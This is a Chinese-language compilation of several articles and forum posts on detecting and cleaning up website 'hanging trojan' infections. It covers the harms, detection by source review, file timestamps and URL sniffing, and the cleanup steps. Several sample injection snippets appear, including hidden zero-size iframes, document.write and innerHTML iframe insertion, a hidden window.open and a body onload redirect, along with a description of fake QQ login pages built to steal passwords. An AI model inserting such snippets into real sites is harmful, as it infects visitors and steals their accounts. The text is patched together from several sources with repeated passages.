专家教你如何进行网站挂马检测与清除
网站挂马及检测技术
挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,敏感文件扫描,服务器漏洞,程序0day, 等各种方法获得管理员账号,然后登陆后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改页面的容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者FTP,然后直接对页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏被挂马,黑客目的就是盗取浏览该玩家的游戏账号,而那些大型被挂马,则是为了搜集大量的肉鸡。
被挂马不仅会让自己的失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马围哪些容易被挂马呢?越是流量高的对黑客越有吸引力,黑客攻破一个管理上有漏洞并且流量很高的,一天就可以感染数百万人。
那些与公共事业密切相关的,比如政府机关的,,视频,聊天交友,提供盗版软件破解工具的最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
如何检测网站是否被挂黑链以及防止办法
黑链对于做SEO的人来说是个很大的打击,好不容易把站各方面做好了突然给你挂黑链,让你深受其害,轻点的可能是暂时性的降权,严重点的就直接被K了,做站不容易,需要好好把握。
下面结合我几次网站被挂黑链和挂马的经历(由于挂黑链和挂马本质上是一回事,这里就以挂黑链为例),分析一下我们如何才能检测自己网站是否被挂黑链呢?
1、网站在搜索引擎中表现异常。这点在没出问题的话,一般更新之后也不会如此的,如果你网站内容质量和外链质量都有所下降,那么更新过后你网站表现异常也在情理之中。
既然知道网站是怎么被挂黑链的了,那么解决办法只需对症下药就可以了:
1、多观察网站在搜索引擎中的表现;2、多查看网站源代码;3、养成经常检查友情链接或死链接的习惯。4、修改网站权限或是不定期的修改FTP密码。5、如果你网站没有指定 description,那么就要多关注下快照页面抓取的内容了,说不定抓取的内容里面就有被黑链内容,我这次遇到的就是如此;6、如果是共享IP的站点,需要经常性的检查同IP下站点是否正常,最好是用独立IP,将不必要的干扰降至最低。
挂黑链可能很多人都会和挂马联系起来,其实两者都是一回事,都是通过入侵网站篡改程序代码,只是修改的内容不同而已。挂马顾名思义就是挂木马,木马大家都知道其实是一种病毒,自然是对电脑或网站有不同程度的坏处了,我以前一个企业站三天两头的就被挂木马了,每次一打开就自动运行一个脚本程序,把电脑运行速度拖至最慢,于是电脑瞬间卡死,浏览器崩溃,电脑起码过五分钟以上才开始有点反应,换做是别人碰到这种网站来了第一次打死都不会来第二次了。
4、查看网站页面的修改时间。大家都知道在电脑中新建一个文件或者任意编辑一个文件,都会显示最后编辑的时间,网站也一样,一般情况下页面文件最后编辑时间就是你最后上传的时间,上传之后如果没有修改过,那么所有页面的最后修改日期应该是同一天,可以通过FTP工具或者进入虚拟主机管理后台进入webftp查看页面的修改时间,如有异常则表明你网站文件有被修改过。
网站挂马检测
网站挂马检测1. 简介在网络世界中,网站被黑客植入恶意挂马代码是一种很常见的攻击手段。
恶意挂马代码是指黑客将一段具有恶意功能的代码嵌入到网站的页面中,当用户访问被感染的页面时,恶意代码就会被执行,从而导致用户的计算机受到攻击。
为了保障网站和用户的安全,需要进行网站挂马检测。
2. 网站挂马检测的重要性挂马攻击会造成严重的后果,例如:•网站内容被恶意篡改,影响网站的正常运行和用户体验。
•用户计算机被感染,个人信息和敏感数据被窃取。
•网站被搜索引擎标记为不安全网站,导致排名下降和用户流失。
因此,网站挂马检测变得至关重要,通过定期检测可以及早发现潜在的挂马问题,以便采取相应的措施进行修复和保护。
3. 网站挂马检测的方法3.1 定期漏洞扫描每个网站都存在不同程度的漏洞,黑客可以利用这些漏洞进行挂马攻击。
定期进行漏洞扫描是一种常见的网站挂马检测方法。
漏洞扫描工具可以扫描网站的各种漏洞,并生成报告,报告中会列出潜在的挂马漏洞,以便管理员进行修复。
3.2 文件完整性检查网站的核心文件和脚本文件是黑客常常利用的目标。
通过定期检查这些文件的完整性,可以及早发现是否被篡改。
如果发现文件的MD5值或哈希值与原始文件不匹配,就可能存在被挂马的风险。
3.3 网络流量监控黑客常常通过网络流量进行挂马攻击。
建立网络流量监控系统可以及时发现异常的网络流量,并分析其源头,从而及早发现潜在的挂马攻击。
3.4 第三方工具和服务还可以借助第三方工具和服务进行网站挂马检测,例如腾讯云的云安全服务、百度安全管家等。
这些工具和服务通常具有专业的漏洞扫描功能,可以帮助管理员及时发现并解决潜在的挂马问题。
4. 挂马检测的预防措施除了进行定期的挂马检测,还需要采取一些预防措施来降低被挂马的风险。
•定期更新和升级网站的核心文件和脚本,避免利用已知的漏洞进行攻击。
•使用安全的密码和账户管理策略,避免被黑客猜测或破解密码。
•配置良好的防火墙和入侵检测系统,及时阻止异常的访问和攻击。
详解网站挂马的手段
详解网站挂马的手段2009年第一季度,黑客对于漏洞的利用趋势没有明显转变,其主要用途仍然在网页挂马上,包括RealPlayer、迅雷、PPLive等流行软件都出现过严重漏洞,被黑客利用传播木马。
1、利用各种漏洞由于目前流行的各种热门网站、客户端软件和浏览器,都存在着众多漏洞和安全薄弱点,使得用户遭到攻击的渠道暴增;而且,随着黑客-病毒产业链臻于完善,支撑互联网发展的多种商业模式都遭到了盗号木马、木马点击器的侵袭,使得用户对于网络购物、网络支付、网游产业的安全信心遭到打击。
瑞星专家提醒说,现在的木马病毒绝大多数通过漏洞传播,而且多数木马病毒运行时没有明显的异常特征,用户很难及时发现自己已经中毒。
只要用户电脑上的漏洞存在,访问挂马网站中毒的风险就一直存在。
即使安装了杀毒软件,也只能在病毒入侵时拦截,风险比弥补漏洞之后会高许多倍。
2、针对合法信赖的网站门户网站、Web2.0以及搜索类网站代表了当前网站的典型形式,同时也成为黑客们关注的焦点。
借助这些网站庞大的数据库、良好的信誉和对Web2.0应用的有力支持,这些网站拥有高可信赖度和良好的信誉,为那些恶意程序的制造者创造了大量的机会。
传统上,网民们有如下错误观念:只有不良网站才会带毒、才会被挂马,只要坚持良好的浏览习惯,就可以躲避盗号木马的侵袭。
统计数据表明,这样的观念已经过时,那些所谓的“正常网站、大中型网站”正在整个木马链条中发挥着越来越重要的作用。
瑞星公司的抽样统计显示,每天约有30%的网民上网时会遇到挂马网站。
这些挂马网站中80%以上属于管理不严的正规网站,其中包括新闻网站、网络论坛、博客网站等。
多个主流门户网站首页悬挂的广告中被植入木马病毒,用户访问这些网站就会中毒。
显而易见,越来越多的恶意攻击源自合法可信赖的网站。
3、利用“肉鸡”牟利黑客利用“肉鸡”一般有以下几种方式:(1)黑客一旦控制了“肉鸡”,就可以很方便地从该电脑中盗取用户的隐私信息。
专家教你如何轻松检测与清除网站挂马(图文并茂)
专家教你如何轻松检测与清除网站挂马(图文并茂)【导语】本文探讨了如何通过一些工具软件来检测和清除在网站系统中的网页木马,在实际管理维护过程中还有很多本文未提及到的,例如抓包分析,通过分析原始数据包,也能获取被挂马的页面,本文算是抛砖引玉...不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。
目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,杀毒软件仅仅对恶意代码进行查杀,对网页木马以及挂马程序不一定全部查杀,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。
(一)检测挂马页面1.安装urlsnooper 软件Urlsnooper是一款URL嗅探工具,其官方主页地址为:,目前已经不提供免费下载了,可以到下载该软件。
安装非常简单,按照提示进行安装即可。
第一次使用时需要程序会自动检查网卡,查看能否正常连接网络,设置正确无误后,应该出现如图1所示的画面。
图1 安装正确后的界面2.对网站进行侦测在Urlsnooper中的“Protocol Filter”中选择“Show All”,然后单击“Sniff Network”按钮开始监听网络。
接着使用IE浏览器打开需要进行检测木马的网站,Urlsnooper会自动抓取网站中的所有连接,在Index中按照五位数字序号进行排列,如图2所示。
图2 监听结果说明:在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,Urlsnooper会在下方中显示详细的监听结果,如图2所示,就发现存在一段挂马代码:在百度搜索中对其进行搜索,如图3所示,有30多项搜索结果,从查询结果可以辅佐证明该段代码为挂马代码。
如何检测网站是否被挂马
如何检测网站是否被挂马
站长最头疼的一件事大概就是网站被挂马了吧!网站被挂马就说明网站的权限很可能已经落入到了其他人的手上,就好比这个网站里有什么都可能被别人知道,网站挂马还会给网站打来巨大的负面影响比如内容被篡改,用户体验变差,严重的可能还会发生企业机密数据泄露等风险,那么对于一个网站如何才能检测出是否被挂马了呢?
1、看网站打开首页是否会自动跳转到陌生页面,一般来说网站被挂马最明显的特征就是网站是否存在跳转到其网站链接,如果我们在用浏览器打开自己网站的时候发现网站突然跳转到陌生的页面,那么这个时候就要想一想是不是网站被挂马了。
可以通过手动检查的方式来常看网站源码,可以通过查找命令查看网以http开头是不是存在自己的链接。
如果源码中出现不是自己网站的链接也不是广告链接的话,站长就应该及时处理挂马了。
2、FTP
坑一通过FTP来参看服务器内文件是否有被修改,如果是网站被挂马而且黑客修改了网站文件,那么相应的文件修改时间也会发生变化,所以要是某些文件的修改时间比其他文件要晚,就说名可能该文件以及被黑客修改过了,也就是说网站以及被挂了木马了。
3、后台进不去
后台是方面管理员进行操作的,要是网站后台进不去,或者没有权限说明后台可能被篡改,也说明网站被挂了马。
4、查看网站收录
可以使用site命令来site一下网站,要是在搜索结果中发现有大量不属于网站的内容,就说明网站可能被挂了马。
有没有什么办法来预防呢
推荐使用一些在线检测挂马的工具,站长工具里也有。
还有就是ftp的用户期限要尽量最小化,重要的文件可以定期的检查是否被修改等等。
网站挂马及检测技术
网站挂马及检测技术网站挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
网站挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏网站被挂马,黑客目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。
网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的网站,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年南京警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马范围哪些网站容易被挂马呢?越是流量高的网站对黑客越有吸引力,黑客攻破一个管理上有漏洞并且网站流量很高的网站,一天就可以感染数百万人。
那些与公共事业密切相关的网站,比如政府机关的网站,色情网站,视频网站,聊天交友网站,提供盗版软件破解工具的网站最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签。
利用js引入网页木马也有多种方法:在js中直接写出框架网页木马示例代码如下:document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>");指定language的属性为"JScript.Encode"还可以引入其他扩展名的js代码,这样就更加具有迷惑性,示例代码如下:<SCRIPT language="JScript.Encode" src=http://www. /mm.jpg></script>;利用js更改body的innerHTML属性,引入网页木马如果对内容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E';利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下:<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menu bar=no,scrollbars=no,width=1,height=1"); </script>;利用URL欺骗示例代码如下:a href="(/迷惑用户的链接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的正常内容</a>:<SCRIPT Language="JavaScript">function www_163_com (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location =no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=ye s,width=800,height=600,left=10,top=10"); }</SCRIPT>3.body挂马使用如下代码,就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。
网站服务器被挂马的处理方案
网站服务器被挂马的处理方案本方案主要解决网站的WEB服务器出现木马的情况后,操作指导手册。
根据先期摸索处理的经验,整理此文档,若有不足,请指出补充。
前言:服务器木马的防范应以预防为主,加强软硬件防火墙管理。
加强程序健壮性测试,及时检测,修复,操作系统,应用平台,WEB程序可能存在的漏洞和后门。
由于面向互联网的WEB服务的特性,决定了WEB服务器具有开放性,无法从根本上拒绝来自互联网任意一台电脑上的非法请求,但也应做好预防,万一出现状况,也能快速的处理修复。
木马入侵期的探测。
在木马入侵期,非法来源的IP会频繁请求服务器,带来网络访问的异常。
一方面可以从机房监控的CPU使用率和并发数以及网络流量等参数可以看出异常。
另外可以从WEB的服务器错误日志文件的大小可以看出来。
在正常访问情况下,每天日志的大小波动不会很大,且和网站总体PV值曲线相吻合。
在前段时间有外界探测或攻击的情况下。
WEB的错误日志大小数倍于正常值,且错误日志的内容都是对同一网址的持续请求。
就是不正常的访问状况。
感染木马的症状服务器被置入木马的症状表现有。
1,用360浏览器打开有木马的网页,浏览器状态栏会变红,出现红色警示。
2,某些防病毒软件会报警提示。
3,使用谷歌浏览器访问网站会被禁止。
以上症状并一定会同时出现,搜索引擎,防病毒软件也会有误报的情况。
但当有任何一种情况,应足以重视。
加强排查。
木马的检测和清除手段1,如出现有木马的页面警示,可以依照警示内容检查当前页面源码,发现木马所处的位置予以清除。
2,使用谷歌站长工具检查完整。
按站长工具检索的结果进行处理。
3,使用360网站安全检测工具进行检测。
360网站安全检测工具是360新推出的一项服务,推荐,访问地址是: 4,采用铱迅WEBSEHLL扫描工具进行服务器程序文件的扫描,检查可疑文件,高危文件是否有木马痕迹。
/download.html5,人工排查。
被植入的木马一般都有一定规律性。
任何自动化工具都不能取代人工的分析和处理。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
专家教你如何进行网站挂马检测与清除不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。
目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,杀毒软件仅仅对恶意代码进行查杀,对网页木马以及挂马程序不一定全部查杀,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。
(一)检测挂马页面1.安装urlsnooper软件Urlsnooper是一款URL嗅探工具,其官方主页地址为:http://www.donationcoder.co m/urlsnooper,目前已经不提供免费下载了,可以到/detail -11525.html下载该软件。
安装非常简单,按照提示进行安装即可。
第一次使用时需要程序会自动检查网卡,查看能否正常连接网络,设置正确无误后,应该出现如图1所示的画面。
图1安装正确后的界面2.对网站进行侦测在Urlsnooper中的“ProtocolFilter”中选择“ShowAll”,然后单击“SniffNetwor k”按钮开始监听网络。
接着使用IE浏览器打开需要进行检测木马的网站,Urlsnooper会自动抓取网站中的所有连接,在Index中按照五位数字序号进行排列,如图2所示。
图2监听结果说明:在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,Urlsnooper会在下方中显示详细的监听结果,如图2所示,就发现存在一段挂马代码:在百度搜索中对其进行搜索,如图3所示,有30多项搜索结果,从查询结果可以辅佐证明该段代码为挂马代码。
图3搜索结果说明:要善于运用网络搜索引擎,通过搜索可以知道目前关于该问题的描述和解决方法等360督导招募中,赶紧报名吧!【题材征集】2011-2012新春语音祝福题材征集[回到顶部][回复此楼][引用][举报] 2楼 2009-07-02 10:483.对地址进行解码4大皆空金币:373经验:1589等级:初中二年级功勋:2短信该地址采用了一种编码,我对常用的这种编码值进行了整理,如下表所示,从中可以找出该代码中的真实地址为。
4.获取该网站相关内容可以使用Flashget的资源管理器去获取该网站的内容,如图4所示,打开Flashget下载工具,单击“工具”-“站点资源探索器”,打开站点资源探索器,在地址中输入“”,然后回车即可获取该网站的一些资源,在站点资源探索器中可以直接下载看见的文件,下载到本地进行查看。
图4 使用“站点资源探索器”获取站点资源说明:使用“Flashget站点资源探索器”可以很方便的获取挂马者代码地址中的一些资源,这些资源可能是挂马的真实代码,透过这些代码可以知道挂马者是采用哪个漏洞,有时候还可以获取0day。
在本例中由于时间较长,挂马者已经撤销了原来的挂马程序文件,在该网站中获取的html文件没有用处,且有些文件已经不存在了,无法对原代码文件进行分析。
5.常见的挂马代码(1)框架嵌入式网络挂马网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。
通常的挂马代码如下:解释:在打开插入该句代码的网页后,就也就打开了 /muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
(2)Js调用型网页挂马js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。
通常代码如下:/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。
这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了。
(3)图片伪装挂马随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了。
图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:注:当用户打开/test.htm是,显示给用户的是http: ///test.jpg,而/test.htm网页代码也随之运行。
(4)网络钓鱼挂马(也称为伪装调用挂马)网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。
这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。
比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,如图5所示。
等用户输入完提交后,就把这些信息发送到攻击者指定的地方,如图6。
图5 伪装QQ页面图6 获取的QQ密码(5)伪装挂马高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者security.cto 等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:[回到顶部][回复此楼][引用][举报] 3楼 2009-07-02 10:493.对地址进行解码该地址采用了一种编码,我对常用的这种编码值进行了整理,如下表所示,从中可以找出该代码中的真实地址为。
4大皆空金币:373经验:1589等级:初中二年级功勋:2短信4.获取该网站相关内容可以使用Flashget的资源管理器去获取该网站的内容,如图4所示,打开Flashget下载工具,单击“工具”-“站点资源探索器”,打开站点资源探索器,在地址中输入“”,然后回车即可获取该网站的一些资源,在站点资源探索器中可以直接下载看见的文件,下载到本地进行查看。
图4 使用“站点资源探索器”获取站点资源说明:使用“Flashget站点资源探索器”可以很方便的获取挂马者代码地址中的一些资源,这些资源可能是挂马的真实代码,透过这些代码可以知道挂马者是采用哪个漏洞,有时候还可以获取0day。
在本例中由于时间较长,挂马者已经撤销了原来的挂马程序文件,在该网站中获取的html文件没有用处,且有些文件已经不存在了,无法对原代码文件进行分析。
5.常见的挂马代码(1)框架嵌入式网络挂马网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。
通常的挂马代码如下:解释:在打开插入该句代码的网页后,就也就打开了 /muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
(2)Js调用型网页挂马js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。
通常代码如下:/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。
这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了。
(3)图片伪装挂马随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了。
图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:注:当用户打开/test.htm是,显示给用户的是http: ///test.jpg,而/test.htm网页代码也随之运行。
(4)网络钓鱼挂马(也称为伪装调用挂马)网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。
这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。
比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,如图5所示。
等用户输入完提交后,就把这些信息发送到攻击者指定的地方,如图6。
图5 伪装QQ页面图6 获取的QQ密码(5)伪装挂马高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者security.cto 等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:4大皆空于2009-07-02 11:17:51 编辑过该帖4大皆空 金币:373 经验:1589等级:初中二年级 功勋:2短信 [回到顶部][回复此楼][引用][举报] 4 楼 2009-07-02 11:15 (二)清除网站中的恶意代码(挂马代码) 1.确定挂马文件清除网站恶意代码首先需要知道哪些文件被挂马了,判断方法有三个,方法一就是通过直接查看代码,从中找出挂马代码;方法二是通过查看网站目录修改时间,通过时间进行判断;方法三使用本文提到的软件进行直接定位,通过监听找出恶意代码。
在本案例中,网站首页是被确认挂马了,通过查看时间知道被挂马时间是8月25日左右,因此可以通过使用资源管理器中的搜索功能,初步定位时间为8月24日至26日,搜索这个时间范围修改或者产生的文件,如图7,图8所示,搜索出来几十个这个时间段的文件。
图7 搜索被修改文件图8 搜索结果2.清除恶意代码可以使用记事本打开代码文件从中清除恶意代码,在清除代码时一定要注意不要使用FrontPage的预览或者设计,否则会直接访问挂马网站,感染木马程序。
建议使用记事本等文本编辑器。
在清除恶意代码过程中,发现挂马者竟然对js文件也不放过,如图9所示。
图9 对js文件进行挂马技巧:可以使用Frontpage中的替换功能替换当前站点中的所有指定代码。
(三)总结与回顾本文探讨了如何通过一些工具软件来检测和清除在网站系统中的网页木马,在实际管理维护过程中还有很多本文未提及到的,例如抓包分析,通过分析原始数据包,也能获取被挂马的页面,本文算是抛砖引玉。